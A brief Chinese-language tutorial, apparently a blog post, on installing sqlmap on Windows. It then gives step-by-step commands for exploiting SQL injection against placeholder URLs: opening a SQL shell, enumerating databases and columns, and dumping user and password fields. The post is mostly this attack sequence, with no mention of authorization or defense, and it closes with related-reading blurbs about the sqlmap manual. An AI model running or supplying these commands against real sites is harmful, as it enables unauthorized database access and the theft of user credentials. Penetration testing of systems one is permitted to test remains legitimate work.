msld
sqlmap依托于Python,首先下载python 和 sqlmap
下载地址
python 安装一步步默认即可,安装完后将sqlmap 放入python根目录下
这还没结束,然后桌面新建快捷方式
然后找到新建的快捷方式,右键属性修改起始位置为你的sqlmap的地址
之后就可已正常使用sqlmap了
1.sqlmap.py -u [url]http://192.168.159.1/news.php?id=1[/url] --sql-shell (URL内容用引号引起来最好[url][/url]替代为引号)
2.查找数据库msyql
sqlmap.py -u “http://www.xxx.com/link.php?id=321” --dbs
3.通过2中的表得出列名(假如表为table_name)
sqlmap.py -u “http://www.xxx.com/link.php?id=321” -D dataname -T table_name --columns
4.获取字段的值(假如扫描出id,user,password字段)
sqlmap.py -u “http://www.xxx.com/link.php?id=321” -D dataname -T table_name -C “id,user,password” --dump
相关阅读
零、前言 Sqlmap是十分著名的、自动化的SQL注入工具。为了较为系统地学习Sqlmap,我决定翻译一遍Sqlmap的用户手册,于是便有了此文
Sqlmap 是一种开源的渗透测试工具,可以自动检测和利用 Sql 注入漏洞以及接入该数据库的服务器。它拥有非常强大的检测引擎、具有多